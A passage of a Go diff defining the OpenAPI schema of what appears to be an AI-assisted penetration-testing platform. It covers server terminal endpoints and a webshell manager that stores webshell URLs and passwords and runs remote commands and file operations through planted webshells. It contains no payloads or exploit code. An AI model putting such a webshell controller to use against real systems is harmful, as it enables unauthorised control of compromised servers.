map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "success": map[string]interface{}{"type": "boolean", "description": "是否连接成功"}, + "error": map[string]interface{}{"type": "string", "description": "失败原因(success=false时)"}, + "model": map[string]interface{}{"type": "string", "description": "实际使用的模型(success=true时)"}, + "latency_ms": map[string]interface{}{"type": "number", "description": "延迟毫秒数(success=true时)"}, + }, + }, + }, + }, + }, + "400": map[string]interface{}{"description": "参数错误"}, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + + // ==================== 终端 ==================== + "/api/terminal/run": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"终端"}, + "summary": "执行终端命令", + "description": "在服务器上执行Shell命令并返回结果。", + "operationId": "terminalRun", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "required": []string{"command"}, + "properties": map[string]interface{}{ + "command": map[string]interface{}{"type": "string", "description": "要执行的命令"}, + "shell": map[string]interface{}{"type": "string", "description": "Shell类型(默认sh/cmd)"}, + "cwd": map[string]interface{}{"type": "string", "description": "工作目录(可选)"}, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "执行完成", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "stdout": map[string]interface{}{"type": "string", "description": "标准输出"}, + "stderr": map[string]interface{}{"type": "string", "description": "标准错误"}, + "exit_code": map[string]interface{}{"type": "integer", "description": "退出码"}, + "error": map[string]interface{}{"type": "string", "description": "执行错误(可选)"}, + }, + }, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + "/api/terminal/run/stream": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"终端"}, + "summary": "流式执行终端命令", + "description": "以SSE流式方式执行Shell命令,实时返回输出。每个事件包含 JSON: {\"t\": \"out\"|\"err\"|\"exit\", \"d\": \"数据\", \"c\": 退出码}", + "operationId": "terminalRunStream", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "required": []string{"command"}, + "properties": map[string]interface{}{ + "command": map[string]interface{}{"type": "string", "description": "要执行的命令"}, + "shell": map[string]interface{}{"type": "string", "description": "Shell类型(默认sh/cmd)"}, + "cwd": map[string]interface{}{"type": "string", "description": "工作目录(可选)"}, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "SSE事件流", + "content": map[string]interface{}{ + "text/event-stream": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "string", + "description": "Server-Sent Events流,每个事件为JSON: {\"t\":\"out|err|exit\",\"d\":\"data\",\"c\":exitCode}", + }, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + "/api/terminal/ws": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"终端"}, + "summary": "WebSocket终端", + "description": "通过WebSocket建立交互式终端连接,支持PTY。客户端发送文本/二进制数据作为命令输入,也可发送JSON: {\"type\":\"resize\",\"cols\":80,\"rows\":24} 调整终端大小。服务端返回二进制PTY输出。", + "operationId": "terminalWS", + "responses": map[string]interface{}{ + "101": map[string]interface{}{"description": "WebSocket连接已建立"}, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + + // ==================== WebShell管理 ==================== + "/api/webshell/connections": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"WebShell管理"}, + "summary": "列出WebShell连接", + "description": "获取所有已保存的WebShell连接配置列表。", + "operationId": "listWebshellConnections", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "array", + "items": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "id": map[string]interface{}{"type": "string", "description": "连接ID"}, + "url": map[string]interface{}{"type": "string", "description": "WebShell URL"}, + "password": map[string]interface{}{"type": "string", "description": "连接密码"}, + "type": map[string]interface{}{"type": "string", "description": "Shell类型", "enum": []string{"php", "asp", "aspx", "jsp", "custom"}}, + "method": map[string]interface{}{"type": "string", "description": "请求方法", "enum": []string{"get", "post"}}, + "cmd_param": map[string]interface{}{"type": "string", "description": "命令参数名"}, + "remark": map[string]interface{}{"type": "string", "description": "备注"}, + "created_at": map[string]interface{}{"type": "string", "format": "date-time"}, + }, + }, + }, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + "post": map[string]interface{}{ + "tags": []string{"WebShell管理"}, + "summary": "创建WebShell连接", + "description": "保存一个新的WebShell连接配置。", + "operationId": "createWebshellConnection", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "required": []string{"url"}, + "properties": map[string]interface{}{ + "url": map[string]interface{}{"type": "string", "description": "WebShell URL"}, + "password": map[string]interface{}{"type": "string", "description": "连接密码"}, + "type": map[string]interface{}{"type": "string", "description": "Shell类型", "enum": []string{"php", "asp", "aspx", "jsp", "custom"}}, + "method": map[string]interface{}{"type": "string", "description": "请求方法", "enum": []string{"get", "post"}}, + "cmd_param": map[string]interface{}{"type": "string", "description": "命令参数名"}, + "remark": map[string]interface{}{"type": "string", "description": "备注"}, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{"description": "创建成功"}, + "400": map[string]interface{}{"description": "参数错误"}, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + "/api/webshell/connections/{id}": map[string]interface{}{ + "put": map[string]interface{}{ + "tags": []string{"WebShell管理"}, + "summary": "更新WebShell连接", + "description": "更新已有的WebShell连接配置。", + "operationId": "updateWebshellConnection", + "parameters": []map[string]interface{}{ + {"name": "id", "in": "path", "required": true, "description": "连接ID", "schema": map[string]interface{}{"type": "string"}}, + }, + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "url": map[string]interface{}{"type": "string"}, + "password": map[string]interface{}{"type": "string"}, + "type": map[string]interface{}{"type": "string", "enum": []string{"php", "asp", "aspx", "jsp", "custom"}}, + "method": map[string]interface{}{"type": "string", "enum": []string{"get", "post"}}, + "cmd_param": map[string]interface{}{"type": "string"}, + "remark": map[string]interface{}{"type": "string"}, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{"description": "更新成功"}, + "401": map[string]interface{}{"description": "未授权"}, + "404": map[string]interface{}{"description": "连接不存在"}, + }, + }, + "delete": map[string]interface{}{ + "tags": []string{"WebShell管理"}, + "summary": "删除WebShell连接", + "description": "删除指定的WebShell连接配置。", + "operationId": "deleteWebshellConnection", + "parameters": []map[string]interface{}{ + {"name": "id", "in": "path", "required": true, "description": "连接ID", "schema": map[string]interface{}{"type": "string"}}, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{"description": "删除成功"}, + "401": map[string]interface{}{"description": "未授权"}, + "404": map[string]interface{}{"description": "连接不存在"}, + }, + }, + }, + "/api/webshell/connections/{id}/state": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"WebShell管理"}, + "summary": "获取连接状态", + "description": "获取WebShell连接的保存状态数据。", + "operationId": "getWebshellConnectionState", + "parameters": []map[string]interface{}{ + {"name": "id", "in": "path", "required": true, "description": "连接ID", "schema": map[string]interface{}{"type": "string"}}, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "state": map[string]interface{}{"type": "object", "description": "状态数据(任意JSON)"}, + }, + }, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + "put": map[string]interface{}{ + "tags": []string{"WebShell管理"}, + "summary": "保存连接状态", + "description": "保存WebShell连接的状态数据。", + "operationId": "saveWebshellConnectionState", + "parameters": []map[string]interface{}{ + {"name": "id", "in": "path", "required": true, "description": "连接ID", "schema": map[string]interface{}{"type": "string"}}, + }, + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "state": map[string]interface{}{"type": "object", "description": "状态数据(任意JSON)"}, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{"description": "保存成功"}, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + "/api/webshell/connections/{id}/ai-history": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"WebShell管理"}, + "summary": "获取AI对话历史", + "description": "获取指定WebShell连接的AI辅助对话历史消息。", + "operationId": "getWebshellAIHistory", + "parameters": []map[string]interface{}{ + {"name": "id", "in": "path", "required": true, "description": "连接ID", "schema": map[string]interface{}{"type": "string"}}, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "conversationId": map[string]interface{}{"type": "string"}, + "messages": map[string]interface{}{ + "type": "array", + "items": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "id": map[string]interface{}{"type": "string"}, + "role": map[string]interface{}{"type": "string"}, + "content": map[string]interface{}{"type": "string"}, + "createdAt": map[string]interface{}{"type": "string", "format": "date-time"}, + }, + }, + }, + }, + }, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + "/api/webshell/connections/{id}/ai-conversations": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"WebShell管理"}, + "summary": "列出AI对话", + "description": "获取指定WebShell连接的所有AI辅助对话列表。", + "operationId": "listWebshellAIConversations", + "parameters": []map[string]interface{}{ + {"name": "id", "in": "path", "required": true, "description": "连接ID", "schema": map[string]interface{}{"type": "string"}}, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "array", + "items": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "id": map[string]interface{}{"type": "string"}, + "title": map[string]interface{}{"type": "string"}, + "createdAt": map[string]interface{}{"type": "string", "format": "date-time"}, + }, + }, + }, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + "/api/webshell/exec": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"WebShell管理"}, + "summary": "执行WebShell命令", + "description": "通过指定的WebShell连接执行远程命令。", + "operationId": "webshellExec", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "required": []string{"url", "command"}, + "properties": map[string]interface{}{ + "url": map[string]interface{}{"type": "string", "description": "WebShell URL"}, + "password": map[string]interface{}{"type": "string"}, + "type": map[string]interface{}{"type": "string", "enum": []string{"php", "asp", "aspx", "jsp", "custom"}}, + "method": map[string]interface{}{"type": "string", "enum": []string{"get", "post"}}, + "cmd_param": map[string]interface{}{"type": "string"}, + "command": map[string]interface{}{"type": "string", "description": "要执行的命令"}, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "执行结果", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "ok": map[string]interface{}{"type": "boolean"}, + "output": map[string]interface{}{"type": "string", "description": "命令输出"}, + "error": map[string]interface{}{"type": "string", "description": "错误信息"}, + "http_code": map[string]interface{}{"type": "integer", "description": "HTTP响应码"}, + }, + }, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + "/api/webshell/file": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"WebShell管理"}, + "summary": "WebShell文件操作", + "description": "通过WebShell执行远程文件操作(列目录、读写文件、创建目录、重命名、删除、上传等)。", + "operationId": "webshellFileOp", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "required": []string{"url", "action", "path"}, + "properties": map[string]interface{}{ + "url": map[string]interface{}{"type": "string", "description": "WebShell URL"}, + "password": map[string]interface{}{"type": "string"}, + "type": map[string]interface{}{"type": "string", "enum": []string{"php", "asp", "aspx", "jsp", "custom"}}, + "method": map[string]interface{}{"type": "string", "enum": []string{"get", "post"}}, + "cmd_param": map[string]interface{}{"type": "string"}, + "action": map[string]interface{}{"type": "string", "description": "操作类型", "enum": []string{"list", "read", "delete", "write", "mkdir", "rename", "upload", "upload_chunk"}}, + "path": map[string]interface{}{"type": "string", "description": "目标文件/目录路径"}, + "target_path": map[string]interface{}{"type": "string", "description": "目标路径(rename时使用)"}, + "content": map[string]interface{}{"type": "string", "description": "文件内容(write/upload时使用)"}, + "chunk_index": map[string]interface{}{"type": "integer", "description": "分块索引(upload_chunk时使用)"}, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "操作结果", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "ok": map[string]interface{}{"type": "boolean"}, + "output": map[string]interface{}{"type": "string"}, + "error": map[string]interface{}{"type": "string"}, + }, + }, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + + // ==================== 对话附件 ==================== + "/api/chat-uploads": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"对话附件"}, + "summary": "列出附件", + "description": "获取对话附件文件列表,可按对话ID过滤。", + "operationId": "listChatUploads", + "parameters": []map[string]interface{}{ + {"name": "conversation", "in": "query", "required": false, "description": "按对话ID过滤", "schema": map[string]interface{}{"type": "string"}}, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "files": map[string]interface{}{ + "type": "array", + "items": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "relativePath": map[string]interface{}{"type": "string"}, + "absolutePath": map[string]interface{}{"type": "string"}, + "name": map[string]interface{}{"type": "string"}, + "size": map[string]interface{}{"type": "integer"}, + "modifiedUnix": map[string]interface{}{"type": "integer"}, + "date": map[string]interface{}{"type": "string"}, + "conversationId": map[string]interface{}{"type": "string"}, + "subPath": map[string]interface{}{"type": "string"}, + }, + }, + }, + "folders": map[string]interface{}{"type": "array", "items": map[string]interface{}{"type": "string"}}, + }, + }, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + "post": map[string]interface{}{ + "tags": []string{"对话附件"}, + "summary": "上传附件", + "description": "上传文件到对话附件目录(multipart/form-data)。", + "operationId": "uploadChatFile", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "multipart/form-data": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "required": []string{"file"}, + "properties": map[string]interface{}{ + "file": map[string]interface{}{"type": "string", "format": "binary", "description": "上传的文件"}, + "conversationId": map[string]interface{}{"type": "string", "description": "关联的对话ID(可选)"}, + "relativeDir": map[string]interface{}{"type": "string", "description": "目标目录相对路径(可选)"}, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "上传成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "ok": map[string]interface{}{"type": "boolean"}, + "relativePath": map[string]interface{}{"type": "string"}, + "absolutePath": map[string]interface{}{"type": "string"}, + "name": map[string]interface{}{"type": "string"}, + }, + }, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + "delete": map[string]interface{}{ + "tags": []string{"对话附件"}, + "summary": "删除附件", + "description": "删除指定的对话附件文件。", + "operationId": "deleteChatUpload", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "required": []string{"path"}, + "properties": map[string]interface{}{ + "path": map[string]interface{}{"type": "string", "description": "文件相对路径"}, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{"description": "删除成功"}, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + "/api/chat-uploads/download": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"对话附件"}, + "summary": "下载附件", + "description": "下载指定的对话附件文件。", + "operationId": "downloadChatUpload", + "parameters": []map[string]interface{}{ + {"name": "path", "in": "query", "required": true, "description": "文件相对路径", "schema": map[string]interface{}{"type": "string"}}, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "文件下载", + "content": map[string]interface{}{ + "application/octet-stream": map[string]interface{}{ + "schema": map[string]interface{}{"type": "string", "format": "binary"}, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + "404": map[string]interface{}{"description": "文件不存在"}, + }, + }, + }, + "/api/chat-uploads/content": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"对话附件"}, + "summary": "获取附件文本内容", + "description": "读取并返回文本文件的内容。", + "operationId": "getChatUploadContent", + "parameters": []map[string]interface{}{ + {"name": "path", "in": "query", "required": true, "description": "文件相对路径", "schema": map[string]interface{}{"type": "string"}}, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "content": map[string]interface{}{"type": "string", "description": "文件文本内容"}, + }, + }, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + "404": map[string]interface{}{"description": "文件不存在"}, + }, + }, + "put": map[string]interface{}{ + "tags": []string{"对话附件"}, + "summary": "写入附件文本内容", + "description": "写入或覆盖文本文件的内容。", + "operationId": "putChatUploadContent", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "required": []string{"path", "content"}, + "properties": map[string]interface{}{ + "path": map[string]interface{}{"type": "string", "description": "文件相对路径"}, + "content": map[string]interface{}{"type": "string", "description": "文件文本内容"}, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{"description": "写入成功"}, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + "/api/chat-uploads/mkdir": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"对话附件"}, + "summary": "创建附件目录", + "description": "在对话附件目录下创建子目录。", + "operationId": "mkdirChatUpload", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "required": []string{"name"}, + "properties": map[string]interface{}{ + "parent": map[string]interface{}{"type": "string", "description": "父目录相对路径"}, + "name": map[string]interface{}{"type": "string", "description": "目录名称"}, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "创建成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "ok": map[string]interface{}{"type": "boolean"}, + "relativePath": map[string]interface{}{"type": "string"}, + }, + }, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + "/api/chat-uploads/rename": map[string]interface{}{ + "put": map[string]interface{}{ + "tags": []string{"对话附件"}, + "summary": "重命名附件", + "description": "重命名对话附件文件或目录。", + "operationId": "renameChatUpload", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "required": []string{"path", "newName"}, + "properties": map[string]interface{}{ + "path": map[string]interface{}{"type": "string", "description": "当前文件相对路径"}, + "newName": map[string]interface{}{"type": "string", "description": "新名称"}, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "重命名成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "ok": map[string]interface{}{"type": "boolean"}, + "relativePath": map[string]interface{}{"type": "string"}, + }, + }, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + + // ==================== 机器人集成 ==================== + "/api/robot/wecom": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"机器人集成"}, + "summary": "企业微信回调验证", + "description": "企业微信服务器URL验证回调(用于配置消息接收地址时的验证)。无需认证。", + "operationId": "wecomCallbackVerify", + "security": []map[string]interface{}{}, + "parameters": []map[string]interface{}{ + {"name": "msg_signature", "in": "query", "required": true, "schema": map[string]interface{}{"type": "string"}}, + {"name": "timestamp", "in": "query", "required": true, "schema": map[string]interface{}{"type": "string"}}, + {"name": "nonce", "in": "query", "required": true, "schema": map[string]interface{}{"type": "string"}}, + {"name": "echostr", "in": "query", "required": true, "schema": map[string]interface{}{"type": "string"}}, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{"description": "验证成功,返回解密后的echostr"}, + }, + }, + "post": map[string]interface{}{ + "tags": []string{"机器人集成"}, + "summary": "企业微信消息回调", + "description": "接收企业微信推送的消息事件。无需认证,由企业微信服务器调用。", + "operationId": "wecomCallbackMessage", + "security": []map[string]interface{}{}, + "responses": map[string]interface{}{ + "200": map[string]interface{}{"description": "处理成功"}, + }, + }, + }, + "/api/robot/dingtalk": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"机器人集成"}, + "summary": "钉钉消息回调", + "description": "接收钉钉推送的消息事件。无需认证,由钉钉服务器调用。", + "operationId": "dingtalkCallback", + "security": []map[string]interface{}{}, + "responses": map[string]interface{}{ + "200": map[string]interface{}{"description": "处理成功"}, + }, + }, + }, + "/api/robot/lark": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"机器人集成"}, + "summary": "飞书消息回调", + "description": "接收飞书推送的消息事件。无需认证,由飞书服务器调用。", + "operationId": "larkCallback", + "security": []map[string]interface{}{}, + "responses": map[string]interface{}{ + "200": map[string]interface{}{"description": "处理成功"}, + }, + }, + }, + "/api/robot/test": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"机器人集成"}, + "summary": "测试机器人消息处理", + "description": "模拟机器人消息处理流程,用于调试和验证。需要登录认证。", + "operationId": "testRobot", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "required": []string{"platform", "text"}, + "properties": map[string]interface{}{ + "platform": map[string]interface{}{"type": "string", "description": "平台类型", "enum": []string{"dingtalk", "lark", "wecom"}}, + "user_id": map[string]interface{}{"type": "string", "description": "模拟用户ID", "example": "test"}, + "text": map[string]interface{}{"type": "string", "description": "消息文本", "example": "帮助"}, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{"description": "处理成功"}, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + + // ==================== 多代理Markdown ==================== + "/api/multi-agent/markdown-agents": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"多代理Markdown"}, + "summary": "列出Markdown代理", + "description": "获取所有多代理Markdown定义文件列表。", + "operationId": "listMarkdownAgents", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "agents": map[string]interface{}{ + "type": "array", + "items": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "filename": map[string]interface{}{"type": "string", "description": "文件名"}, + "id": map[string]interface{}{"type": "string", "description": "代理ID"}, + "name": map[string]interface{}{"type": "string", "description": "代理名称"}, + "description": map[string]interface{}{"type": "string", "description": "代理描述"}, + "is_orchestrator": map[string]interface{}{"type": "boolean", "description": "是否为编排器"}, + "kind": map[string]interface{}{"type": "string", "description": "编排类型"}, + }, + }, + }, + "dir": map[string]interface{}{"type": "string", "description": "代理定义目录路径"}, + }, + }, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + "post": map[string]interface{}{ + "tags": []string{"多代理Markdown"}, + "summary": "创建Markdown代理", + "description": "创建新的多代理Markdown定义文件。", + "operationId": "createMarkdownAgent", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "required": []string{"name"}, + "properties": map[string]interface{}{ + "filename": map[string]interface{}{"type": "string", "description": "文件名(可选,自动生成)"}, + "id": map[string]interface{}{"type": "string", "description": "代理ID"}, + "name": map[string]interface{}{"type": "string", "description": "代理名称"}, + "description": map[string]interface{}{"type": "string", "description": "代理描述"}, + "tools": map[string]interface{}{"type": "array", "items": map[string]interface{}{"type": "string"}, "description": "可用工具列表"}, + "instruction": map[string]interface{}{"type": "string", "description": "代理指令"}, + "bind_role": map[string]interface{}{"type": "string", "description": "绑定角色"}, + "max_iterations": map[string]interface{}{"type": "integer", "description": "最大迭代次数"}, + "kind": map[string]interface{}{"type": "string", "description": "编排类型"}, + "raw": map[string]interface{}{"type": "string", "description": "原始Markdown内容"}, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "创建成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "filename": map[string]interface{}{"type": "string"}, + "message": map[string]interface{}{"type": "string", "example": "已创建"}, + }, + }, + }, + }, + }, + "400": map[string]interface{}{"description": "参数错误"}, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + "/api/multi-agent/markdown-agents/{filename}": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"多代理Markdown"}, + "summary": "获取Markdown代理详情", + "description": "获取指定Markdown代理定义文件的详细内容。", + "operationId": "getMarkdownAgent", + "parameters": []map[string]interface{}{ + {"name": "filename", "in": "path", "required": true, "description": "文件名", "schema": map[string]interface{}{"type": "string"}}, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "filename": map[string]interface{}{"type": "string"}, + "raw": map[string]interface{}{"type": "string", "description": "原始Markdown内容"}, + "id": map[string]interface{}{"type": "string"}, + "name": map[string]interface{}{"type": "string"}, + "description": map[string]interface{}{"type": "string"}, + "tools": map[string]interface{}{"type": "array", "items": map[string]interface{}{"type": "string"}}, + "instruction": map[string]interface{}{"type": "string"}, + "bind_role": map[string]interface{}{"type": "string"}, + "max_iterations": map[string]interface{}{"type": "integer"}, + "kind": map[string]interface{}{"type": "string"}, + "is_orchestrator": map[string]interface{}{"type": "boolean"}, + }, + }, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + "404": map[string]interface{}{"description": "代理不存在"}, + }, + }, + "put": map[string]interface{}{ + "tags": []string{"多代理Markdown"}, + "summary": "更新Markdown代理", + "description": "更新指定的Markdown代理定义。", + "operationId": "updateMarkdownAgent", + "parameters": []map[string]interface{}{ + {"name": "filename", "in": "path", "required": true, "description": "文件名", "schema": map[string]interface{}{"type": "string"}}, + }, + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "name": map[string]interface{}{"type": "string"}, + "description": map[string]interface{}{"type": "string"}, + "tools": map[string]interface{}{"type": "array", "items": map[string]interface{}{"type": "string"}}, + "instruction": map[string]interface{}{"type": "string"}, + "bind_role": map[string]interface{}{"type": "string"}, + "max_iterations": map[string]interface{}{"type": "integer"}, + "kind": map[string]interface{}{"type": "string"}, + "raw": map[string]interface{}{"type": "string"}, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "更新成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "message": map[string]interface{}{"type": "string", "example": "已保存"}, + }, + }, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + "404": map[string]interface{}{"description": "代理不存在"}, + }, + }, + "delete": map[string]interface{}{ + "tags": []string{"多代理Markdown"}, + "summary": "删除Markdown代理", + "description": "删除指定的Markdown代理定义文件。", + "operationId": "deleteMarkdownAgent", + "parameters": []map[string]interface{}{ + {"name": "filename", "in": "path", "required": true, "description": "文件名", "schema": map[string]interface{}{"type": "string"}}, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "删除成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "message": map[string]interface{}{"type": "string", "example": "已删除"}, + }, + }, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + "404": map[string]interface{}{"description": "代理不存在"}, + }, + }, + }, + + // ==================== Skills管理 - 缺失端点 ==================== + "/api/skills/{name}/files": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"Skills管理"}, + "summary": 